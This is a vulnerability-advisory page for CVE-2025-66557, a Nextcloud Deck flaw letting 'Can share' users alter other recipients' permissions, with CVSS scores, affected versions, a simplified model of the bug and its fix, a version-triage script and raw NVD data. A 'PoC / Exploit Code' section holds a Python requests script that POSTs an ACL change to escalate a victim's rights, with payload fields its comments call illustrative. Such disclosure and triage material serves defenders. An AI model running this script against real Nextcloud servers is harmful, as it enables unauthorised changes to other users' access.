Security Vulnerability Report
CVE-2025-66557 CVSS 5.4 MEDIUM

Published: 2025-12-05 18:15:59
Last Modified: 2025-12-09 16:46:17

Description

Nextcloud Deck is a kanban-style organization tool aimed at personal planning and project organization for teams, integrated with Nextcloud. Prior to 1.14.6 (1.14 release line) and 1.15.2 (1.15 release line), a bug in the permission logic allowed users who held only the "Can share" permission on a board to modify the permissions of the board's other recipients. "Can share" is meant to let a participant share the board with further recipients, not to change what existing recipients may do, so this is an improper access control issue (CWE-284) reachable by any authenticated user who has been given share rights on a board. This vulnerability is fixed in 1.14.6 and 1.15.2.
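The following is an added, simplified model of the bug class described above; it is not Deck's code and not the actual patch. It assumes a board ACL with per-recipient edit/share/manage flags (Deck exposes these as "Can edit", "Can share" and "Can manage"), and it models the flaw as an ACL-update handler that is gated on the share right instead of the manage right. The exact condition in the vulnerable release is not known from this page and is an assumption.

```python
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the acting user lacks the right needed for an ACL change."""


@dataclass
class AclEntry:
    user: str
    edit: bool = False
    share: bool = False    # "Can share": may add new recipients
    manage: bool = False   # may administer the board, including other ACL entries


@dataclass
class Board:
    owner: str
    acl: dict = field(default_factory=dict)  # user id -> AclEntry

    def entry(self, user):
        return self.acl.get(user)


def can_share(board, actor):
    e = board.entry(actor)
    return actor == board.owner or (e is not None and e.share)


def can_manage(board, actor):
    e = board.entry(actor)
    return actor == board.owner or (e is not None and e.manage)


def _apply(board, target, rights):
    entry = board.entry(target)
    if entry is None:
        raise KeyError(f"{target} is not a recipient of this board")
    for name, value in rights.items():
        if name not in ("edit", "share", "manage"):
            raise ValueError(f"unknown right {name!r}")
        setattr(entry, name, bool(value))


def update_acl_vulnerable(board, actor, target, **rights):
    """Bug class (assumed shape of the flaw): the check that gates adding a
    recipient (share) is reused for changing an existing recipient's rights,
    so holding 'Can share' is enough to rewrite anyone's permissions."""
    if not can_share(board, actor):
        raise Forbidden(f"{actor} may not share this board")
    _apply(board, target, rights)


def update_acl_fixed(board, actor, target, **rights):
    """Changing another recipient's rights is a management action, so it is
    gated on manage (or ownership), not on share."""
    if not can_manage(board, actor):
        raise Forbidden(f"{actor} may not manage permissions on this board")
    _apply(board, target, rights)


def fresh_board():
    """Constructed scenario: 'attacker' holds only 'Can share'; 'victim' can edit and manage."""
    b = Board(owner="alice")
    b.acl["attacker"] = AclEntry("attacker", share=True)
    b.acl["victim"] = AclEntry("victim", edit=True, manage=True)
    return b


def demo():
    """Run the same ACL changes against both checks and report the outcome."""
    results = {}

    b = fresh_board()
    update_acl_vulnerable(b, "attacker", "victim", edit=False, manage=False)  # strip the victim
    update_acl_vulnerable(b, "attacker", "attacker", manage=True)           # promote self
    results["vulnerable"] = (b.entry("victim").manage, b.entry("attacker").manage)

    b = fresh_board()
    try:
        update_acl_fixed(b, "attacker", "victim", edit=False, manage=False)
        results["fixed_attacker"] = "allowed"
    except Forbidden:
        results["fixed_attacker"] = "denied"

    update_acl_fixed(b, "alice", "victim", manage=False)  # the owner still can
    results["fixed_owner"] = b.entry("victim").manage
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the model is the authorisation boundary, not the data structure: a share-only participant must be able to add recipients and nothing more, and every code path that edits or deletes an existing ACL entry needs its own manage check rather than inheriting the share check.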

CVSS Details

CVSS Score (CNA: GitHub security advisory)
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

CVSS Score (NVD)
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

The two scores differ only in the Availability metric (A:L vs A:N). Both agree that the attacker needs a low-privileged authenticated account (PR:L), no user interaction, and that the impact is a Low integrity loss with no confidentiality impact.

Weakness
CWE-284 Improper Access Control (CNA); NVD-CWE-noinfo (NVD)

Configurations (Affected Products)

cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE, versions from 1.14.0 up to but excluding 1.14.6
cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE, versions from 1.15.0 up to but excluding 1.15.2
Nextcloud Deck 1.14.x < 1.14.6 (fixed in 1.14.6)
Nextcloud Deck 1.15.x < 1.15.2 (fixed in 1.15.2)
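An added triage helper (not from the advisory or the Deck project) that maps an installed Deck version, for example as reported by `occ app:list`, onto the NVD version ranges listed above. The ranges are taken from the CPE match data on this page; versions older than 1.14.0 are not in those ranges, and since the description says "prior to 1.14.6" they are reported separately rather than as fixed.

```python
import re

# Ranges from the NVD CPE match data: [start, end) tuples.
AFFECTED_RANGES = (
    ((1, 14, 0), (1, 14, 6)),
    ((1, 15, 0), (1, 15, 2)),
)
LOWEST_LISTED = min(lo for lo, _ in AFFECTED_RANGES)


def parse_version(text):
    """'1.14.5', 'v1.14.5' or '1.15.0-rc.1' -> (1, 14, 5).

    A pre-release suffix is dropped, so 1.15.0-rc.1 compares as 1.15.0 and is
    treated as affected; that is the conservative direction for triage.
    """
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify(version_text):
    """Return 'affected', 'fixed' or 'outside listed ranges' for one version."""
    v = parse_version(version_text)
    if any(lo <= v < hi for lo, hi in AFFECTED_RANGES):
        return "affected"
    if v < LOWEST_LISTED:
        # 1.13.x and older are not in NVD's ranges; the advisory's "prior to
        # 1.14.6" wording gives no reason to treat them as patched.
        return "outside listed ranges"
    return "fixed"


def triage(versions):
    """Classify a list of version strings, e.g. collected from several instances."""
    return {v: classify(v) for v in versions}


if __name__ == "__main__":
    # Constructed sample input covering each branch of the classification.
    sample = ["1.13.9", "1.14.5", "1.14.6", "1.15.0-rc.1", "1.15.1", "1.15.2", "1.16.0"]
    for version, verdict in triage(sample).items():
        print(f"{version:12} {verdict}")
```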

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-66557 PoC - Nextcloud Deck Permission Bypass
# Target: Nextcloud Deck 1.14.x < 1.14.6 or 1.15.x < 1.15.2
# The account used here only needs "Can share" permission on the board;
# the bug is that this is enough to change other recipients' permissions.

TARGET_URL = "https://vulnerable-nextcloud.example.com"
USERNAME = "attacker"
PASSWORD = "password123"   # a Nextcloud app password works as well
BOARD_ID = "1"
TARGET_USER_ID = "victim"


def get_session():
    """Build an authenticated session.

    Nextcloud's app APIs accept HTTP Basic authentication, so no form login
    is needed. Deck's REST API requires the OCS-APIRequest header.
    """
    session = requests.Session()
    session.auth = (USERNAME, PASSWORD)
    session.headers.update({
        "Content-Type": "application/json",
        "OCS-APIRequest": "true",
    })
    return session


def exploit_permission_bypass(session):
    """Attempt to change another recipient's ACL entry on the board.

    In a fixed version this must be rejected for a user who only holds
    "Can share"; in an affected version the change is accepted.
    """
    exploit_url = f"{TARGET_URL}/index.php/apps/deck/api/v1.0/boards/{BOARD_ID}/acl"

    # Illustrative payload only: the exact ACL field names and values must be
    # taken from the Deck REST API documentation for the targeted version.
    exploit_payload = {
        "type": "user",
        "id": TARGET_USER_ID,
        "participant": {
            "permission": "edit",  # escalate the victim's permission
            "owner": True,
        },
    }

    response = session.post(exploit_url, json=exploit_payload, timeout=30)

    if response.ok:
        print("[+] Permission change accepted; verify the board ACL to confirm")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request rejected. Status: {response.status_code}")
        print(f"[-] Response: {response.text}")


if __name__ == "__main__":
    exploit_permission_bypass(get_session())

References

https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wwr8-hx9g-rjvv (Vendor Advisory, Patch)
https://github.com/nextcloud/deck/pull/7131 (Issue Tracking, Patch)
https://github.com/nextcloud/deck/commit/f1da8b30a455f02373d44154da04494c949a95ae (Patch)
https://hackerone.com/reports/3247499 (Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66557", "sourceIdentifier": "security-advisories@github.com", "published": "2025-12-05T18:15:58.977", "lastModified": "2025-12-09T16:46:17.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.14.6 and 1.15.2, a bug in the permission logic allowed users with \"Can share\" permission to modify the permissions of other recipients. This vulnerability is fixed in 1.14.6 and 1.15.2."}], "metrics": {"cvssMetricV31": [{"source": "security-advisories@github.com", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "security-advisories@github.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "nvd@nist.gov", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.14.0", "versionEndExcluding": "1.14.6", "matchCriteriaId": "29F12EA5-770A-4C40-A049-CA2EA77CE016"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.15.0", "versionEndExcluding": "1.15.2", "matchCriteriaId": "32A3D86C-1990-4E96-8027-AF235997BE7D"}]}]}], "references": [{"url": "https://github.com/nextcloud/deck/commit/f1da8b30a455f02373d44154da04494c949a95ae", "source": "security-advisories@github.com", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/deck/pull/7131", "source": "security-advisories@github.com", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wwr8-hx9g-rjvv", "source": "security-advisories@github.com", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3247499", "source": "security-advisories@github.com", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}